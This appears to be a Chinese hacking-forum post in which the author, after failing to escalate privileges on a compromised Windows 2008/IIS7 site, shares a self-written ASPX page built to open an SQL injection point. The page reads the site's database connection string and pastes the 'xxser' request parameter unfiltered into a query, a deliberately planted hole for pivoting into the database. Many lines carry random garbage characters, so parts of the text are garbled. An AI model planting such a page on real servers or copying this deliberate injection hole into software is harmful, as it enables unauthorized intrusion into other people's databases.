昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。0 X( I( c% c3 O7 S# ~
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。9 c6 i x5 G' B1 { H
代码量不多,自己写个拉倒了。烦死了。% E6 X& ?' }6 F1 @3 l
" H1 y. e7 I3 `( c- Y' \: z6 L% `
( u) q$ R5 o, A) P2 N<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> B" y: P+ ?* j% Q0 y- [
<html xmlns="http://www.w3.org/1999/xhtml">
& o: `$ n7 B- Q( F8 p<head runat="server">2 Q, t4 q# ]7 K3 y' G4 A; W! R
<title>暗影aspx构造注射专用页面</title>) W$ Q3 @" G8 V A: x4 z5 ~. Y
</head>
, X! ?0 o k, ?! \4 \<body>7 {( {1 P. f3 o) `. }1 Y
<form id="form1" runat="server">
0 _( f' n' H* M' E! J; b <div>
9 T" n& ^" f0 ] <script language="c#" runat="server">
9 q- R' @6 r6 t
5 x1 P4 e7 I3 d, u void page_init(object sender, EventArgs e)
+ d, r$ E4 v$ j2 x {
- c) Z0 B1 N5 @
6 l) @% J' }0 b. T System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
/ V9 U3 [4 V; \& J2 G
: T; l+ }! k2 { conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();$ o4 j5 X" b7 m/ J9 b: [
conn.Open();1 q4 Q# V6 o( J( R! K+ O+ f
9 X2 p4 e: D! m9 _( W! b+ z
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
4 ~1 y+ T% |; u+ j) J9 a* Z9 d
* J+ Y" p: {# a3 l7 O& ?* r4 ]9 E System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);' Q' T& a4 X' x% r. s
int x = command.ExecuteNonQuery();
% V+ [8 t% H- a0 w2 `& p Response.Write(i+"\n");+ [$ C7 B" @ ?" \1 q- Y+ r
Response.Write(x);
, D* `5 _& q: Y( ]$ [9 i conn.Close();
, k" Y" |* X( u$ N }$ h, A7 Q4 J" y+ O* v7 A) G
/ w1 J, {& K5 R* b r. M </script>
4 F0 T" W' R/ G7 Q+ ` </div>
0 g# a. u8 A5 b8 r% P, t$ R6 E </form>
& x( X6 f1 {1 q: |1 V, ]$ k! O* h</body> M/ ]8 l) q( P5 {4 H
</html>
6 g2 S% G1 b6 R0 l" V! _3 B4 z- W" |5 y |